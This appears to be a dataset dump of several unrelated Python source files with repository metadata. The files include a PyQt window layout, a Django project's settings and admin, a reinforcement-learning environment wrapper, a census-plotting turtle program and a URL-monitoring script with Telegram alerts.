MainWindow.setTabOrder(self.prjButton, self.taskButton)
MainWindow.setTabOrder(self.taskButton, self.slaveCkBox)
MainWindow.setTabOrder(self.slaveCkBox, self.microCkBox)
MainWindow.setTabOrder(self.microCkBox, self.logCkBox)
MainWindow.setTabOrder(self.logCkBox, self.exportsButton)
MainWindow.setTabOrder(self.exportsButton, self.prjLineEdit)
MainWindow.setTabOrder(self.prjLineEdit, self.taskLineEdit)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Slave Sucess V2.0"))
self.prjButton.setText(_translate("MainWindow", "Prj"))
self.taskButton.setText(_translate("MainWindow", "Task"))
self.slaveCkBox.setText(_translate("MainWindow", "Export Slave Task"))
self.microCkBox.setText(_translate("MainWindow", "Export Microstation Script"))
self.logCkBox.setText(_translate("MainWindow", "Export Log File"))
self.groupBox.setTitle(_translate("MainWindow", "Report Options"))
self.runSlaveCkBox.setText(_translate("MainWindow", "Start Slave"))
self.exportsButton.setText(_translate("MainWindow", "Export"))
self.logWindow.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:8pt;\">[TerraScan Project]</span></p></body></html>"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
[
"plsm.mail@gmail.com"
] |
plsm.mail@gmail.com
|
ab53f17683a218aa029fd6013d35ccf0601a5433
|
91cce084c57639a636c5e4ddae7f8d9e5db3b3ab
|
/starter_code/migrations/versions/108af48a152f_.py
|
7c5f8777c1633a0e797b9060869f40a15286d16e
|
[] |
no_license
|
Aishwarya1403/Udacity-Fyyur_project-FullStack
|
42209286b59d3164381b532e02b2822d4dde5f5f
|
721d5d8af835b13ad87b2670856a9fb221618d36
|
refs/heads/master
| 2022-11-26T22:15:43.680217
| 2020-08-05T09:45:39
| 2020-08-05T09:45:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 828
|
py
|
"""empty message
Revision ID: 108af48a152f
Revises: 6acad7d52248
Create Date: 2020-05-19 04:05:39.462836
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '108af48a152f'
down_revision = '6acad7d52248'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('Show', 'start_time',
existing_type=postgresql.TIMESTAMP(),
nullable=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('Show', 'start_time',
existing_type=postgresql.TIMESTAMP(),
nullable=True)
# ### end Alembic commands ###
|
[
"a.srivastava1403@gmail.com"
] |
a.srivastava1403@gmail.com
|
3fa5ddad1d1612a8b0d4168c59f4f0549f95f6ff
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02937/s033330652.py
|
6b68eb0299616b86752097386250b1b8f9320039
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 473
|
py
|
import bisect
s = input()
t = input()
n = len(s)
m = len(t)
indices = [[] for _ in range(26)]
for i in range(n):
indices[ord(s[i]) - ord('a')].append(i)
for i in range(n):
indices[ord(s[i]) - ord('a')].append(i + n)
ans = 0
p = 0
for i in range(m):
c = ord(t[i]) - ord('a')
if len(indices[c]) == 0:
print(-1)
exit()
p = indices[c][bisect.bisect_left(indices[c], p)] + 1
if p >= n:
p -= n
ans += n
ans += p
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
8e1c89bb6ae45adc09778546ef4ded2df3e23d3a
|
287118f0a80d4cc07cf40c4c2cd08734a792bf90
|
/python/manage.py
|
3f154b0e92a0525b01db81a5024af2f3673463c5
|
[] |
no_license
|
bfincher/bfim
|
13818acd272fbacf677f16b21ee76a9d2ed55051
|
cabfa434a9daedb47be4786fb7e980379407296b
|
refs/heads/master
| 2020-07-13T21:37:20.736140
| 2015-06-30T01:26:03
| 2015-06-30T01:26:03
| 73,883,751
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bfim_site.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"brian@fincherhome.com"
] |
brian@fincherhome.com
|
26b5572ac0a822370e8ce622fbd232f24cebdcaa
|
51521862877916257fb965dcf6114f5402fa8b35
|
/code/test55.py
|
659dccfd09b71613c95709701dab0a194e2ceec9
|
[] |
no_license
|
404akhan/proj3-math
|
592170e032ea7f55830a3c66eaff3c01a02af34b
|
bdccf3d769e3d7c0ab6ea923e3442dd304edc002
|
refs/heads/master
| 2021-01-21T17:28:30.531798
| 2017-05-21T20:34:33
| 2017-05-21T20:34:33
| 91,953,071
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,417
|
py
|
# lasso
from helpers import *
import matplotlib.pyplot as plt
top = 70
train, test = get_tr_cv()
cells = pickle.load(open('data/very_new_cells_one_hot-%d.p'%top, 'rb'))
print train.shape
print cells.shape
print 'top', top
version = 67
lr = 0.03
aver_loss, aver_corr = None, None
bsize = 10000
arr_loss = []
for lamb in reversed([3*1e-4, 1e-4, 3*1e-5, 1e-5, 3*1e-6, 1e-6, 0.]):
print 'lamb %f STARTED' % (lamb)
betas = np.zeros((get_total_drug(), cells.shape[1]))
betas0 = np.zeros((get_total_drug()))
accum_grad = np.zeros_like(betas)
accum_grad0 = np.zeros_like(betas0)
accum_loss = 0
accum_correct = 0
for iteration, sample in enumerate(train):
k, i, j, target = sample
y = np.tanh(
np.dot(betas[i, :], cells[k, :]) - np.dot(betas[j, :], cells[k, :]) + betas0[i] - betas0[j]
)
L = 1./2 * (y - target)**2
accum_correct += (y>0 and target==1) or (y<=0 and target==-1)
dy = y - target
da = (1 - y**2) * dy
dbi = cells[k, :] * da + lamb*np.sign(betas[i, :])
dbj = -cells[k, :] * da + lamb*np.sign(betas[j, :])
db0i = da
db0j = -da
accum_grad[i, :] += dbi
accum_grad[j, :] += dbj
accum_grad0[i] += db0i
accum_grad0[j] += db0j
accum_loss += L
if (iteration+1) % bsize == 0:
betas -= lr * accum_grad
betas0 -= lr * accum_grad0
accum_loss_div = accum_loss/bsize
accum_correct /= 1.*bsize
aver_loss = accum_loss_div if aver_loss is None else accum_loss_div * 0.01 + aver_loss * 0.99
aver_corr = accum_correct if aver_corr is None else accum_correct * 0.01 + aver_corr * 0.99
arr_loss.append(accum_loss_div)
if (iteration+1) % bsize*10 == 0:
print 'iter %d, cur_loss %.2f, aver_loss %.2f, accum_correct %.2f, aver_corr %.2f' % \
(iteration+1, accum_loss_div, aver_loss, accum_correct, aver_corr)
accum_grad = np.zeros_like(betas)
accum_grad0 = np.zeros_like(betas0)
accum_loss = 0
accum_correct = 0
lr /= 2
correct = 0
total = 0
for iteration, sample in enumerate(test):
k, i, j, target = sample
y = np.tanh(
np.dot(betas[i, :], cells[k, :]) - np.dot(betas[j, :], cells[k, :]) + betas0[i] - betas0[j]
)
predict = 1 if y > 0 else -1
if predict == target:
correct += 1
total += 1
print 'heldout validation', correct * 1.0 / total, 'lambda', lamb
pickle.dump(betas, open('models/betas-v%d.p'%version, 'wb'))
pickle.dump(betas0, open('models/betas0-v%d.p'%version, 'wb'))
plt.plot(arr_loss)
plt.show()
|
[
"404akhan"
] |
404akhan
|
af2bbcc8ef30479f1f105c85962d48fc4fbeaac4
|
d5e134c4287e2a8e6e676ee6877418c9727e06e3
|
/LINDE799_FinalProject.py
|
e47f61c91a2815d440da0d9025feb8237885717f
|
[] |
no_license
|
ErikLindeman12/CSCI_1133
|
6fcc93f047d0d0ee199a628a4d854070f6da19be
|
91d8ff08b7a327427c9a274442e6ab951f0731ee
|
refs/heads/master
| 2020-03-28T14:54:00.870836
| 2018-09-12T19:57:29
| 2018-09-12T19:57:29
| 148,532,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,117
|
py
|
#Final Project
#Erik Lindeman, LINDE799, 5424984
#CSCI 1133
import turtle
class County:
def __init__(self,name,population):
#setting up instance variables
self.name = name
self.population = population
#Finding which population was the highest for scaling, checks each population to see if it's bigger than the current highest population
self.highestPopulation = 0
for x in range(0,len(self.population)):
if(self.population[x]>self.highestPopulation):
self.highestPopulation = self.population[x]
#Sets equation of the line stuff to 0 so I can use "+=" later on
self.m = 0
self.b = 0
#Setting up the County vs State specific things, ex. color and placement of title
self.color = "red"
self.extraDist = 0
#Finds the equation for the line just so i don't have to later
self.findEq()
def findEq(self):
#Finds the equation by using the equation given. Uses a for loop so the code isn't as long
for x in range(0,6):
self.m += float(self.population[x])*(-1/7+x*2/35)
self.b += float(self.population[x])*(11/21-x*3/21)
#Rounds the equation to 4 Decimal Places to meet requirements
self.m = round(self.m,4)
self.b = round(self.b,4)
def __lt__(self,rhand):
#Just if the m of the right one is more than the left side, return true.
if(self.m<rhand.m):
return True
else:
return False
def display(self,y_max=200):
#Sets the x xcalar for later use (not really needed)
xscalar = 110
#Sets the scaling for the Y axis so the graph is spaced relative to the high population, rather than being a set scaling
self.yscalar = (y_max+300)/self.highestPopulation
#Basically just finds the highest population and rounds it to 1 sig fig so it can display the spacing increments on the graph.
#If the turtle is at the origin (so bassically if this is the first time the turtle has run) set up the graph
if(turtle.xcor() == 0 and turtle.ycor() == 0):
#Setting up turtle settings
turtle.color("black")
turtle.hideturtle()
turtle.speed(0)
#Drwa the y axis
turtle.penup()
turtle.goto(-300,-300)
turtle.pendown()
turtle.goto(-300,y_max)
#Draw the X axis
turtle.penup()
turtle.goto(250,-300)
turtle.pendown()
turtle.goto(-300,-300)
turtle.penup()
#Write titles for the Axes
turtle.goto(-450,0)
turtle.write("Population (people)")
turtle.goto(0,-350)
turtle.write("Date (years)")
#Draw each increment on the X axis
for x in range(1,6):
turtle.penup()
turtle.goto(-310+xscalar*x,-320)
turtle.write("201{}".format(x))
turtle.goto(-300+xscalar*x,-300)
turtle.pendown()
turtle.goto(-300+xscalar*x,-285)
#Draw each increment on the Y axis
for x in range(1,5):
turtle.penup()
turtle.goto(-300,-300+(300+y_max)/4*x)
turtle.pendown()
turtle.goto(turtle.xcor()+20,turtle.ycor())
turtle.penup()
turtle.goto(turtle.xcor()-70,turtle.ycor()-10)
turtle.write(self.highestPopulation/4*x)
#Change the color based on what it initialized as
turtle.color(self.color)
turtle.penup()
for x in range(0,6):
#Draww all 6 points, moving over 110 every time, and placing the y Axis spot relative to the Y scalar (so highest is on top)
turtle.goto(x*xscalar-300,self.population[x]*self.yscalar-300)
turtle.dot(6,self.color)
#Draw the Line Based on the equation
turtle.goto(-300,self.b*self.yscalar-300)
turtle.pendown()
turtle.goto(250,(self.b+5*self.m)*self.yscalar-300)
turtle.penup()
#Actually displays the Equation
turtle.goto(turtle.xcor()+10,turtle.ycor())
turtle.write("y={0}x+{1}".format(float(self.m),float(self.b)))
#Displays the name either at the set height or a bit above it so the state and county doesn't overlap
turtle.goto(-300,240+20*self.extraDist)
turtle.write(self.name)
def getName(self):
#just makes it so the name can be obtained in other classes (this was written before I realized you could just do Object.variablename)
return self.name
class State(County):
def __init__(self,name,population,counties):
#Initialize it with the county initialization (to not copy paste code basically)
County.__init__(self,name,population)
self.counties = counties
#Overwrite the State/County specific variables to make it clear it's a state
self.color = "blue"
self.extraDist = 1
def display(self):
#Displays the State but with a specific y_max
County.display(self,200)
def greatestCounty(self):
#Used for analysis, basically finds the largest county then returns it
self.largestCounty = self.counties[0]
for x in range(0,len(self.counties)):
if(self.counties[x]>self.largestCounty):
self.largestCounty = self.counties[x]
return self.largestCounty
def leastCounty(self):
#Used for analysis, basically finds the Smallest county then returns it
self.lowestCounty = self.counties[0]
for x in range(0,len(self.counties)):
if(self.counties[x]>self.lowestCounty):
self.lowestCounty = self.counties[x]
return self.lowestCounty
class Analysis:
def __init__(self,state_list):
#Sets up instance variables
self.state_list = state_list
def displayState(self,name):
#Finds the state object based on the name, then displays it
for x in range(0,len(self.state_list)):
if(str(self.state_list[x].getName()) == name):
self.state_list[x].display()
def displayStateGreatestCounty(self,name):
#Finds the state object based on the name
for x in range(0,len(self.state_list)):
if(str(self.state_list[x].getName()) == name):
state = self.state_list[x]
#Displays the state
state.display()
#Based on the y_scalar, it finds what to say as y_max so both the state and county are scaled the same
y_max = float(state.yscalar)*float(state.greatestCounty().highestPopulation)-300
#Finds the largest county then displays it with the y_max
state.greatestCounty().display(y_max)
def displayStateLeastCounty(self,name):
#Finds the state object based on the name
for x in range(0,len(self.state_list)):
if(str(self.state_list[x].getName()) == name):
state = self.state_list[x]
#Displays the state
state.display()
#Based on the y_scalar, it finds what to say as y_max so both the state and county are scaled the same
y_max = float(state.yscalar)*float(state.leastCounty().highestPopulation)-300
#Finds the smallest county then displays it with the y_max
state.leastCounty().display(y_max)
def clear(self):
#Sets up the desired clear function
turtle.reset()
def greatestState(self):
#Finds the Greatest state, then returns its name
self.greatest_state = self.state_list[0]
for x in range(0,len(self.state_list)):
if(self.state_list[x]>self.greatest_state):
self.greatest_state = self.state_list[x]
print(self.greatest_state.getName())
def leastState(self):
#Finds the loweest state, then returns its name
self.least_state = self.state_list[0]
for x in range(0,len(self.state_list)):
if(self.state_list[x]<self.least_state):
self.least_state = self.state_list[x]
print(self.least_state.getName())
#Opens the CSV
censusdataobj = open("censusdata.csv",'r')
#Discards the first line (no actual data)
censusdataobj.readline()
#Sets the 2nd line to the data
data = censusdataobj.readline()
#So that it doesn't cause an error the first time (could use try catch I guess, but no real need)
begin = True
#Empty state list so I can append to it
stateList = []
#Does this while there is data to read
while not(data == ""):
#Makes a list of all the data because CSV splits it by periods
data = data.split(",")
#If it's a state (or not a county)
if not("County" in data[0]):
#If it's not the loop, create a state variable in stateList
if not(begin):
stateList.append(State(currentState,statePopulation,countyList))
else:
#if it is the first loop, set begin o false
begin = False
#Set the current state name, and then find the population of the state in all 6 spots
currentState = data[0]
statePopulation = []
for x in range(1,7):
statePopulation.append(int(data[x]))
#sets the countyList to empty so I can append to it
countyList = []
else:
#Find the Name
countyName = data[0]
#prepare to find the population of each year
countyPopulation = []
for x in range(1,7):
countyPopulation.append(int(data[x]))
#make a new county in the countylist, to be added to the state variable once the next one comes
countyList.append(County(countyName,countyPopulation))
#read the next line (strategically at the end so if it's "", it doesn't error out or anything)
data = censusdataobj.readline()
#Close the File
censusdataobj.close()
#setting up analysis object
analysis = Analysis(stateList)
#put testing code here, before turtle.done() so it doesn't close the window immediately
turtle.done()
|
[
"eriklindeman12@gmail.com"
] |
eriklindeman12@gmail.com
|
2170705885ec02edbec127709a97f58b54329cc5
|
dba6e34fa96ca6ea478a9f877b26ab0da4c72b94
|
/main.py
|
7bd96bbd7b1ec79c0b156ba4f655ddf2141469b7
|
[] |
no_license
|
acekun141/getreq
|
7a5bd0dfc7701c275ea2f8da0ee238cbed2c1264
|
bd8635bce2181bf767232198914d532a262dde35
|
refs/heads/master
| 2020-06-16T14:19:02.155166
| 2019-07-10T14:20:29
| 2019-07-10T14:20:29
| 195,606,119
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,797
|
py
|
import requests
import time
import json
import bot
from bot import telegram_bot
with open('config.json') as config_file:
data = json.load(config_file)
list_urls = [
{
'link':'http://127.0.0.1:8000/Page1',
'name':'Page1'
},
{
'link':'http://127.0.0.1:8000',
'name':'HomePage'
}
]
def start():
print("Running...")
new_bot = telegram_bot(data['bot_token'],data['bot_chatID'])
# offset = new_bot.get_update()[-1]['update_id']
while True:
# list_data_bot = new_bot.get_update_with_offset(offset)
# if len(list_data_bot) > 1:
# offset += 1
# list_data_bot = new_bot.get_update_with_offset(offset)
# for data_bot in list_data_bot:
# if data_bot['message']['chat']['id'] == new_bot.groupID:
# offset = data_bot['update_id']
# if new_bot.check_message(data_bot['message']['text']):
# if data_bot['message']['text'][5:] == 'show':
# for i in range(len(list_urls)):
# msg = '{}. Link: {} - Name: {}'.format(i+1,list_urls[i]['link'],list_urls[i]['name'])
# new_bot.send_message(msg)
for url in list_urls:
try:
req = requests.get(url['link'])
if req.status_code != 200:
new_bot.send_message('Warning: Status code of {} is {}'.format(url['name'],req.status_code))
pass
except Exception as value:
new_bot.send_message('Exception: {}'.format(value))
pass
time.sleep(10)
if __name__ == "__main__":
try:
start()
except Exception as value:
print(value)
|
[
"acekun141@gmail.com"
] |
acekun141@gmail.com
|
c07eaaf18f9a7002308b7ea958242eb11f4115bc
|
b1d7310f3b9199b582251b2b2de72593e27c5e02
|
/env_utils.py
|
c1c645398addccf10f2bb56ffade6b38fd659bab
|
[
"MIT"
] |
permissive
|
Louiealbp/ContrastiveLearningGoalReaching
|
c753081e4ab8c886b87a8498a0d84bc676db6ea1
|
4ef3e22cb8276a8c2f4f313e2b27138b9cd361b3
|
refs/heads/main
| 2023-07-23T05:18:48.126964
| 2021-09-03T21:49:31
| 2021-09-03T21:49:31
| 402,890,443
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,705
|
py
|
import numpy as np
import gym
import os, sys
from arguments import get_args
from mpi4py import MPI
from rl_modules.ddpg_agent import ddpg_agent
import random
import torch
import dmc2gym
from collections import deque
def get_state(env):
##Gets the current state of the environment to allow for true reward calculations - will need to be changed depending on the env/task
name = env.unwrapped.spec.id[:10]
if name == 'dmc_reache':
state = env.physics.named.data.geom_xpos['finger', :2]
state2 = env.physics.named.data.geom_xpos['arm', :2]
toret = [state[0], state[1], state2[0], state2[1]]
elif name == 'dmc_point_':
state = env.physics.named.data.geom_xpos['pointmass', :2]
toret = [state[0], state[1]]
elif name == 'FetchReach':
state = env.sim.get_state()
return np.array(toret)
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
gym.Wrapper.__init__(self, env)
self._k = k
self._frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=1,
shape=((shp[0] * k,) + shp[1:]),
dtype=env.observation_space.dtype
)
self._max_episode_steps = env._max_episode_steps
def reset(self):
obs = self.env.reset()
for _ in range(self._k):
self._frames.append(obs)
return self._get_obs()
def step(self, action):
obs, reward, done, info = self.env.step(action)
self._frames.append(obs)
return self._get_obs(), reward, done, info
def _get_obs(self):
assert len(self._frames) == self._k
return np.concatenate(list(self._frames), axis=0)
class GoalBasedPixelObservationsDMControl(gym.Wrapper):
##This is for the dm control, with single frames
def __init__(self, env, state_based):
gym.Wrapper.__init__(self, env)
self.env = env #maybe unneccessary?
self.desired_goal = None
self.desired_goal_state = None
self._max_episode_steps = env._max_episode_steps
self.state_based = state_based
def reset(self):
self.desired_goal = self.env.reset()
self.desired_goal_state = get_state(self.env)
obs = self.env.reset()
obs_state = get_state(self.env)
achieved_goal = obs
achieved_goal_state = obs_state
if not self.state_based:
self.last_obs = {
'observation': obs.copy(),
'achieved_goal': achieved_goal.copy(),
'desired_goal': self.desired_goal.copy(),
'observation_state': obs_state.copy(),
'achieved_goal_state': achieved_goal_state.copy(),
'desired_goal_state': self.desired_goal_state.copy()
}
else:
self.last_obs = {
'observation': obs_state.copy(),
'achieved_goal': achieved_goal_state.copy(),
'desired_goal': self.desired_goal_state.copy(),
'observation_state': obs_state.copy(),
'achieved_goal_state': achieved_goal_state.copy(),
'desired_goal_state': self.desired_goal_state.copy()
}
return self.last_obs
def step(self, action):
obs, reward, done, info = self.env.step(action)
obs_state = get_state(self.env)
achieved_goal = obs
achieved_goal_state = obs_state
info['is_success'] = np.sqrt(((obs_state - self.desired_goal_state) ** 2).sum()) < 0.03
if not self.state_based:
self.last_obs = {
'observation': obs.copy(),
'achieved_goal': achieved_goal.copy(),
'desired_goal': self.desired_goal.copy(),
'observation_state': obs_state.copy(),
'achieved_goal_state': achieved_goal_state.copy(),
'desired_goal_state': self.desired_goal_state.copy()
}
else:
self.last_obs = {
'observation': obs_state.copy(),
'achieved_goal': achieved_goal_state.copy(),
'desired_goal': self.desired_goal_state.copy(),
'observation_state': obs_state.copy(),
'achieved_goal_state': achieved_goal_state.copy(),
'desired_goal_state': self.desired_goal_state.copy()
}
return self.last_obs, reward, done, info
class GoalBasedPixelObservationsOpenAIGym(gym.Wrapper):
def __init__(self, env, state_based):
gym.Wrapper.__init__(self, env)
self.env = env #maybe unneccessary?
self.desired_goal = None
self.desired_goal_state = None
self._max_episode_steps = env._max_episode_steps
self.state_based = state_based
name = env.unwrapped.spec.id[:10]
if name == 'FetchReach':
payload = torch.load('/home/aaron_putterman/project1/hindsight-experience-replay-master/fetchreachgoals/goals3.pt')
self.states = payload[0] ## 1000 x 10
self.renderings = payload[1] ## 1000 x 100 x 100 x 3
def reset(self):
idx = np.random.randint(0, self.renderings.shape[0])
self.desired_goal = self.renderings[idx].numpy()
self.desired_goal = np.swapaxes(self.desired_goal, 1, 2)
self.desired_goal = np.swapaxes(self.desired_goal, 0, 1)
self.desired_goal_state = self.states[idx].numpy()
obs_state = self.env.reset()
obs_state = obs_state['observation']
self.env.env._get_viewer(mode = 'rgb_array').render(width = 100, height = 100, camera_id = 3)
rendered_obs3 = self.env.env._get_viewer(mode = 'rgb_array').read_pixels(width = 100, height = 100, depth = False)
obs = rendered_obs3[::-1, :, :]
# obs = self.env.render(mode = 'rgb_array', height = 100, width = 100)
obs = np.swapaxes(obs, 1, 2)
obs = np.swapaxes(obs, 0, 1)
achieved_goal = obs
achieved_goal_state = obs_state
if not self.state_based:
self.last_obs = {
'observation': obs.copy(),
'achieved_goal': achieved_goal.copy(),
'desired_goal': self.desired_goal.copy(),
'observation_state': obs_state.copy(),
'achieved_goal_state': achieved_goal_state.copy(),
'desired_goal_state': self.desired_goal_state.copy()
}
else:
self.last_obs = {
'observation': obs_state.copy(),
'achieved_goal': achieved_goal_state.copy(),
'desired_goal': self.desired_goal_state.copy(),
'observation_state': obs_state.copy(),
'achieved_goal_state': achieved_goal_state.copy(),
'desired_goal_state': self.desired_goal_state.copy()
}
return self.last_obs
def step(self, action):
obs_state, reward, done, info = self.env.step(action)
obs_state = obs_state['observation']
# obs = self.env.render(mode = 'rgb_array', height = 100, width = 100)
self.env.env._get_viewer(mode = 'rgb_array').render(width = 100, height = 100, camera_id = 3)
rendered_obs3 = self.env.env._get_viewer(mode = 'rgb_array').read_pixels(width = 100, height = 100, depth = False)
obs = rendered_obs3[::-1, :, :]
obs = np.swapaxes(obs, 1, 2)
obs = np.swapaxes(obs, 0, 1)
achieved_goal = obs
achieved_goal_state = obs_state
info['is_success'] = np.sqrt(((obs_state - self.desired_goal_state) ** 2).sum()) < 0.03
if not self.state_based:
self.last_obs = {
'observation': obs.copy(),
'achieved_goal': achieved_goal.copy(),
'desired_goal': self.desired_goal.copy(),
'observation_state': obs_state.copy(),
'achieved_goal_state': achieved_goal_state.copy(),
'desired_goal_state': self.desired_goal_state.copy()
}
else:
self.last_obs = {
'observation': obs_state.copy(),
'achieved_goal': achieved_goal_state.copy(),
'desired_goal': self.desired_goal_state.copy(),
'observation_state': obs_state.copy(),
'achieved_goal_state': achieved_goal_state.copy(),
'desired_goal_state': self.desired_goal_state.copy()
}
return self.last_obs, reward, done, info
def get_env_params(env, args):
obs = env.reset()
# close the environment
params = {'obs': obs['observation'].shape,
'goal': obs['desired_goal'].shape,
'action': env.action_space.shape[0],
'action_max': env.action_space.high[0],
}
params['max_timesteps'] = env._max_episode_steps
return params
def create_env(args):
##TODO add support for openai gym environments
if args.env_name == 'reacher' or args.env_name == 'point_mass':
task_name = 'easy'
env = dmc2gym.make(
domain_name = args.env_name,
task_name = task_name,
seed = args.seed,
visualize_reward = False,
from_pixels = (args.encoder_type == 'pixel'),
height = args.pre_transform_image_size,
width = args.pre_transform_image_size,
frame_skip = args.action_repeat,
)
# if args.encoder_type == 'pixel':
env = FrameStack(env, k = args.frame_stack)
env = GoalBasedPixelObservationsDMControl(env, args.encoder_type != 'pixel')
return env
elif args.env_name == 'FetchReach-v1':
env = gym.make(args.env_name)
env = GoalBasedPixelObservationsOpenAIGym(env, args.encoder_type != 'pixel')
return env
else:
print("not yet implemented in env_utils.py - create_env")
|
[
"noreply@github.com"
] |
noreply@github.com
|
fbf6bf8a92fdbb61a7f72ca93c5ac06aaadfbe41
|
997c24e536f27d3871c293d1f14abc2410e1ae39
|
/config/settings/local.py
|
f67a181d9a2eccb02377cb2f7fe5a2731c62e63c
|
[
"MIT"
] |
permissive
|
arsenalstriker14/imagetraccloud
|
4b195e407cfd7dec41115c8cf5cb931dcc35cbd0
|
04004d5eabc82e85596bc9e110c9250d5f882e17
|
refs/heads/master
| 2021-01-11T16:58:48.619218
| 2017-02-02T22:18:31
| 2017-02-02T22:18:31
| 79,710,234
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,263
|
py
|
# -*- coding: utf-8 -*-
"""
Local settings
- Run in Debug mode
- Use console backend for emails
- Add Django Debug Toolbar
- Add django-extensions as app
"""
import socket
import os
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', default=True)
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
ALLOWED_HOSTS = ['*']
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env('DJANGO_SECRET_KEY', default='%gkt&m8bzba^lvdhdxxhr5#zn%(ggv)477o_y5sa!k_+9nqa#9')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_PORT = 1025
EMAIL_HOST = 'localhost'
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND',
default='django.core.mail.backends.console.EmailBackend')
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar', )
INTERNAL_IPS = ['127.0.0.1', '10.0.2.2', ]
# tricks to have debug toolbar when developing with docker
if os.environ.get('USE_DOCKER') == 'yes':
ip = socket.gethostbyname(socket.gethostname())
INTERNAL_IPS += [ip[:-1] + "1"]
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions', )
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Your local stuff: Below this line define 3rd party library settings
# ------------------------------------------------------------------------------
|
[
"accounts@chukesinteractive.com"
] |
accounts@chukesinteractive.com
|
ca5197c4632cb5c88a4dbc9e707acb06e8f609c7
|
406b08dac8f90b855309be77c3ad3a7926aaa02e
|
/iron2/admin.py
|
5cb81a061b1b344c54a53bd1209b388c353df3a6
|
[] |
no_license
|
DragonovAk47/SocialQuery1
|
46cdb51dc137cc9f739f2f778bcf2bdaf6cff8dd
|
2d20bc48f04f1bdbcc3eddfe57a1bb1e9278cb21
|
refs/heads/master
| 2020-06-24T06:29:39.179380
| 2019-07-25T18:00:06
| 2019-07-25T18:00:06
| 198,880,431
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 580
|
py
|
from django.contrib import admin
from iron2.models import UserProfile
# Register your models here
# .
class UserProfileAdmin(admin.ModelAdmin):
list_display=('user','Website','Mobile','user_info')
search_list=('Mobile','description',)
list_display_links=('user_info',)
list_editable=('Website',)
def user_info(self,obj):
return obj.description
def get_queryset(self,request):
queryset=super(UserProfileAdmin,self).get_queryset(request)
queryset= queryset.order_by('Mobile')
return queryset
admin.site.register(UserProfile,UserProfileAdmin)
|
[
"35777944+DragonovAk47@users.noreply.github.com"
] |
35777944+DragonovAk47@users.noreply.github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.